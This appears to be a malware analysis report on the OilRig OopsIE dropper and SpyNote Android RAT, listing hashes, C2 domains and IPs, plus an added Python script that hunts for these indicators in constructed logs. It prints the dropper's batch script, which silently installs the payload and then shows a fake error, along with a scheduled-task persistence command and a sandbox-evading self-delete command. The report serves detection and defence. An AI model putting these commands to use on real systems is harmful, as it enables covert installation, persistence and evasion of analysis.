Oilrig OopsIE malware and SpyNote mobile malware
OopsIE dropper
MD5: fe466788a06fc5646bd52fe6732d59bf
SHA-1: b774c171b76c49be5b5efa9374c7d40f5000e184
Authentihash: 824b3bbc2604bd638b42d665c118ec687c7657bff4ff9b348b35036a42a3729d
Dropper batch script (installs the payload, then shows a fake failure message):
C:\Users\admin\AppData\Local\Temp\ztmp\t23092.bat
@echo off
set ztmp=C:\Users\admin\AppData\Local\Temp\ztmp
set MYFILES=C:\Users\admin\AppData\Local\Temp\afolder
set bfcec=t23141.exe
attrib +h C:\Users\admin\AppData\Local\Temp\ztmp
@echo off
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5" /v version
if %errorlevel% equ 0 goto v3
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v version
if %errorlevel% equ 0 goto v4
goto commonexit
:v3
copy %MYFILES%\WinSyncMetastoreV2.exe C:\programdata\WinSyncMetastoreV2.exe
C:\programdata\WinSyncMetastoreV2.exe
goto commonexit
:v4
copy %MYFILES%\WinSyncMetastoreV4.exe C:\programdata\WinSyncMetastoreV4.exe
C:\programdata\WinSyncMetastoreV4.exe
goto commonexit
:commonexit
start "" /wait cmd /c "echo An error occurred during initialization of VpnSrv.dll in 00x41542178!&echo(&pause"
exit
Installation
Drops
OopsIE malware WinSyncMetastore.exe
(https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/)
WinSyncMetastoreV2.exe
MD5: 5998ef679682878e68d5ac4a1733fac5
SHA-256: 36e66597a3ff808acf9b3ed9bc93a33a027678b1e262707682a2fd1de7731e23
WinSyncMetastoreV4.exe
MD5: d41207d54b69fb3eeb7a104f7d36c7b0
SHA-256: 055b7607848777634b2b17a5c51da7949829ff88084c3cb30bcb3e58aae5d8e9
Persistence
cmd.exe /c SchTasks /Create /SC MINUTE /MO 3 /TN "MicrosoftPrintDrive" /TR "wscript C:\ProgramData\WinSyncMetastore.vbs" /f
C2:
defender-update.com
If the samples detect a sandbox, they run the following command, which waits two seconds and then deletes their own executable:
cmd.exe /C choice /C Y /N /D Y /T 2 & Del C:\Users\admin\Desktop\sampale.exe
SpyNote android malware
213.227.140.35, the IP address of defender-update.com, has also served as the command and control server for SpyNote, an off-the-shelf mobile RAT.
client.apk
MD5: 2820c84cf9f34fe999da0bcedea6915d
SHA-1: 0f3ae5c85151686b836fd95e2d680201679101e9
SHA-256: 9727b56953bb6622cc1d3a039e2ebf6ef260dd76c8dcc11f4a1320fbf294621d
102.apk
MD5: 27aaf0e49ebc240933ea5d1a04747977
SHA-1: c7e7ad6d763a41b8d3d7d9301acbe53674041d75
SHA-256: d7bebfd87066e34d2f68ddf39d5637afa978df72bceb8dc690ed1553cdfffa43
IOCs
defender-update.com
windowspatch.com
herkhabar.com
89.248.173.131
213.227.140.35:3210
178.32.211.5
Windows Implantment Module.exe
d41207d54b69fb3eeb7a104f7d36c7b0
ea6321f55ea83e6f2887a2360f8e55b0
3cf8aff7c56cf477bde9adbd543abc40
fe466788a06fc5646bd52fe6732d59bf
27aaf0e49ebc240933ea5d1a04747977
5998ef679682878e68d5ac4a1733fac5
2820c84cf9f34fe999da0bcedea6915d
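The following script is an added detection example, not part of the original report. It turns the dropper batch script, the SchTasks persistence command, the sandbox self-delete command and the IOC list above into hunting rules, and runs them over a handful of constructed process-creation, DNS and network log lines (the log format, the "-" placeholder for an unknown hash, and the benign lines are all assumptions made for the example).

```python
"""Hunt for the OopsIE / SpyNote indicators and behaviours described in the report
in simple tab-separated log lines. Sample lines below are constructed, not real telemetry."""
import re

# Network and file indicators copied from the IOC list in the report.
IOC_DOMAINS = {"defender-update.com", "windowspatch.com", "herkhabar.com"}
IOC_IPS = {"89.248.173.131", "213.227.140.35", "178.32.211.5"}
IOC_MD5 = {
    "fe466788a06fc5646bd52fe6732d59bf",  # OopsIE dropper
    "5998ef679682878e68d5ac4a1733fac5",  # WinSyncMetastoreV2.exe
    "d41207d54b69fb3eeb7a104f7d36c7b0",  # WinSyncMetastoreV4.exe
    "ea6321f55ea83e6f2887a2360f8e55b0",
    "3cf8aff7c56cf477bde9adbd543abc40",
    "27aaf0e49ebc240933ea5d1a04747977",  # 102.apk
    "2820c84cf9f34fe999da0bcedea6915d",  # client.apk
}

# Behaviour rules derived from the dropper batch script, the SchTasks persistence
# command and the sandbox self-delete command quoted in the report.
BEHAVIOUR_RULES = {
    "dotnet_version_probe": re.compile(
        r'reg\s+query\s+"?(?:hklm|hkey_local_machine)\\software\\microsoft\\net framework setup\\ndp', re.I),
    "winsyncmetastore_copy_to_programdata": re.compile(
        r"copy\s+\S*winsyncmetastorev[24]\.exe\s+c:\\programdata\\", re.I),
    "fake_vpnsrv_error_prompt": re.compile(
        r"an error occurred during initialization of vpnsrv\.dll", re.I),
    "schtasks_microsoftprintdrive_vbs": re.compile(
        r'schtasks\s+/create\b.*/tn\s+"?microsoftprintdrive"?.*wscript\s+\S*winsyncmetastore\.vbs', re.I),
    "choice_delay_then_self_delete": re.compile(
        r"choice\s+/c\s+y\s+/n\s+/d\s+y\s+/t\s+\d+\s*&\s*del\s+", re.I),
}

# Constructed sample log: timestamp <TAB> event kind <TAB> image MD5 or "-" <TAB> payload
# (command line for process_create, hostname for dns_query, ip:port for net_connect).
SAMPLE_LOG = [
    '2018-02-22T10:15:01Z\tprocess_create\t-\treg query "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v3.5" /v version',
    "2018-02-22T10:15:02Z\tprocess_create\t-\tcopy C:\\Users\\admin\\AppData\\Local\\Temp\\afolder\\WinSyncMetastoreV4.exe C:\\programdata\\WinSyncMetastoreV4.exe",
    "2018-02-22T10:15:03Z\tprocess_create\td41207d54b69fb3eeb7a104f7d36c7b0\tC:\\programdata\\WinSyncMetastoreV4.exe",
    '2018-02-22T10:15:04Z\tprocess_create\t-\tcmd.exe /c SchTasks /Create /SC MINUTE /MO 3 /TN "MicrosoftPrintDrive" /TR "wscript C:\\ProgramData\\WinSyncMetastore.vbs" /f',
    '2018-02-22T10:15:05Z\tprocess_create\t-\tstart "" /wait cmd /c "echo An error occurred during initialization of VpnSrv.dll in 00x41542178!&echo(&pause"',
    "2018-02-22T10:15:06Z\tdns_query\t-\tdefender-update.com",
    "2018-02-22T10:15:07Z\tnet_connect\t-\t213.227.140.35:3210",
    '2018-02-22T10:20:00Z\tprocess_create\t-\tschtasks /Create /SC DAILY /TN "NightlyBackup" /TR "C:\\Tools\\backup.exe"',  # benign, constructed
    "2018-02-22T10:20:01Z\tdns_query\t-\twww.example.com",  # benign, constructed
    "2018-02-22T10:21:00Z\tprocess_create\t-\tcmd.exe /C choice /C Y /N /D Y /T 2 & Del C:\\Users\\admin\\Desktop\\sampale.exe",
]


def parse_line(line):
    """Split one constructed log line into its four fields."""
    ts, kind, md5, payload = line.rstrip("\n").split("\t", 3)
    return {"ts": ts, "kind": kind, "md5": md5.lower(), "payload": payload}


def match_event(ev):
    """Return the names of every indicator or behaviour rule the event triggers."""
    hits = []
    if ev["kind"] == "process_create":
        if ev["md5"] in IOC_MD5:
            hits.append("ioc_md5")
        hits.extend(name for name, rx in BEHAVIOUR_RULES.items() if rx.search(ev["payload"]))
    elif ev["kind"] == "dns_query":
        if ev["payload"].lower().rstrip(".") in IOC_DOMAINS:
            hits.append("ioc_domain")
    elif ev["kind"] == "net_connect":
        if ev["payload"].rsplit(":", 1)[0] in IOC_IPS:  # drop the port before comparing
            hits.append("ioc_ip")
    return hits


def scan_log(lines):
    """Return (timestamp, rule names, payload) for every line that matched at least one rule."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        hits = match_event(ev)
        if hits:
            findings.append((ev["ts"], tuple(hits), ev["payload"]))
    return findings


if __name__ == "__main__":
    for ts, rules, payload in scan_log(SAMPLE_LOG):
        print(ts, ",".join(rules), payload, sep="  ")
```

The behaviour rules are deliberately specific to the strings seen in this campaign (task name, VBS path, fake VpnSrv.dll prompt, the choice-then-del idiom), so they fire on the quoted commands but not on the ordinary backup task in the sample; the hash, domain and IP checks are plain set lookups that drop the port and trailing dot before comparing.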